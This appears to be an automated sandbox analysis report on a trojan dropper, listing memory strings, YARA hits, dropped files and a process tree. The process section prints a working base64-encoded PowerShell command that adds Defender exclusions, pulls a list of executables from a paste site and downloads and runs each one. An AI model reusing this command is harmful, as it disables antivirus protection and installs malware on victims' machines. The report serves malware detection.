                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567395102.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2568089264.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567166797.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2565806232.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2568336922.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566049332.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566260449.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566452692.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567395102.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2568089264.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566347879.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567166797.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566943172.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2565806232.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2568336922.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567606134.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2566722886.0000000003521000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2567796035.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2566540118.0000000003521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869?hl=es
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-HostLoadImportedModule.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-timeclip
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-tonumber
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tensorflow.org/lite/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://v8.dev/docs/stack-trace-api#customizing-stack-traces.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/FileAPI/#creating-revoking
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webcrypto/#SubtleCrypto-method-wrapKey
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webcrypto/#algorithm-normalization-normalize-an-algorithm
                        Source: powershell.exe, 00000001.00000002.2312453126.000001232D139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2312453126.000001232D200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#Exposed
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webidl.spec.whatwg.org/#Exposed.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webkit.org/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2396268474.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.chromium.org
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.khronos.org/registry/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.khronos.org/spir/visualizer/
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2499097229.000000000321A000.00000004.00000020.00020000.00000000.sdmp, okdtlfsk.k4u3.exe, 0000000B.00000003.2398415394.0000000003CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/copyright.html.
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2484757778.0000000004F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#interface-formdata
                        Source: okdtlfsk.k4u1.exe, 00000009.00000003.2343229505.0000000003E20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_1e9cf918-7
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_9be8dd0f-1
                        Source: Yara matchFile source: 9.3.okdtlfsk.k4u1.exe.4040000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.okdtlfsk.k4u1.exe.3e20000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.okdtlfsk.k4u1.exe.3e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.OpenWith.exe.5060000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.OpenWith.exe.4e40000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.okdtlfsk.k4u1.exe.3e20000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000003.2358387982.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.2343229505.0000000003E20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.2343681612.0000000004040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: okdtlfsk.k4u1.exe PID: 3168, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: OpenWith.exe PID: 7972, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile dump: Steam.exe.11.dr 176739328Jump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile dump: Steam.exe0.11.dr 176739328Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeJump to dropped file
                        Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                        Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D3168 NtQueryInformationProcess,7_2_028D3168
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D3160 NtQueryInformationProcess,7_2_028D3160
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68b6b3.msi
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA3D.tmp
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBA8D.tmp
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBAAD.tmp
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6}
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD8C.tmp
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBE87.tmp
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIBA3D.tmp
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D43207_2_028D4320
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D1B507_2_028D1B50
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D90F97_2_028D90F9
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D18207_2_028D1820
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DCE007_2_028DCE00
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DAE287_2_028DAE28
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D36207_2_028D3620
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DBF0B7_2_028DBF0B
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D57007_2_028D5700
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DD7707_2_028DD770
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D3CE07_2_028D3CE0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D14F97_2_028D14F9
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DE4187_2_028DE418
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D0C107_2_028D0C10
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D8D607_2_028D8D60
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D430F7_2_028D430F
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DEB487_2_028DEB48
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DAB587_2_028DAB58
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D53617_2_028D5361
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DB8AB7_2_028DB8AB
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DA1487_2_028DA148
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D66637_2_028D6663
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DA75B7_2_028DA75B
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028DE40B7_2_028DE40B
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051100407_2_05110040
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051156F07_2_051156F0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051161F07_2_051161F0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051161E17_2_051161E1
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051100077_2_05110007
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051156E07_2_051156E0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051110B07_2_051110B0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_051110C07_2_051110C0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_05115F287_2_05115F28
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_05115BB07_2_05115BB0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_055A9DF87_2_055A9DF8
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_055AA5B07_2_055AA5B0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_055A04787_2_055A0478
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_055A0EC07_2_055A0EC0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_055AA1907_2_055AA190
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_055AA1717_2_055AA171
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_07DB4ED37_2_07DB4ED3
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_07DB4EE07_2_07DB4EE0
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_07DB11C17_2_07DB11C1
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_07DB91B87_2_07DB91B8
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_07DB01687_2_07DB0168
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00830BC19_2_00830BC1
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess token adjusted: SecurityJump to behavior
                        Source: Steam.exe.11.drStatic PE information: Number of sections : 15 > 10
                        Source: Steam.exe0.11.drStatic PE information: Number of sections : 15 > 10
                        Source: setup.exe, 00000000.00000000.1637314507.00000000002E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLEMON.exe4 vs setup.exe
                        Source: setup.exe, 00000000.00000002.1642656975.000000001B8B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs setup.exe
                        Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: okdtlfsk.k4u0.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: okdtlfsk.k4u0.exe.1.dr, -.csCryptographic APIs: 'CreateDecryptor'
                        Source: okdtlfsk.k4u0.exe.1.dr, -.csCryptographic APIs: 'CreateDecryptor'
                        Source: okdtlfsk.k4u0.exe.1.dr, -.csBase64 encoded string: 'TMyPGUHIMeeZC0jAfMGVAkqLXsaPCEnHc8zHKkHRWtuIH13kbMaZAEbJZo6bCFD6WcCQAWrEctDHAlT6VtuZHFHEc9yIFB/CesGjIUHLeMGUVmPAa+GFHUHjbdqRJUXLe9mZVkPAa+qyDEnAJPySCUHdUNPHP0HEe+aIH03LeI69CUCeeNCIMnTKbNyIBEvLJNKZGXvmaseOCErRW9qRDE3LJOaZGWDEa9THXBadKoTHLFfWetieAV32eseKCFaeTNyRHUjAXsaPCEnHc8y5FVTJcMeZHx/HfteZAVLIJMaRAk/Aa9CPGQ=='
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@46/1162@0/7
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\nodejs
                        Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4116:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeMutant created: \Sessions\1\BaseNamedObjects\88c8a67e-b76c-5548-94d2-8ef2a7b533d5
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeMutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2704:120:WilError_03
                        Source: C:\Windows\SysWOW64\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sc3dfxtx.ci2.ps1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe"
                        Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: setup.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: setup.exeReversingLabs: Detection: 71%
                        Source: setup.exeVirustotal: Detection: 81%
                        Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe"
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe"
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where node
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
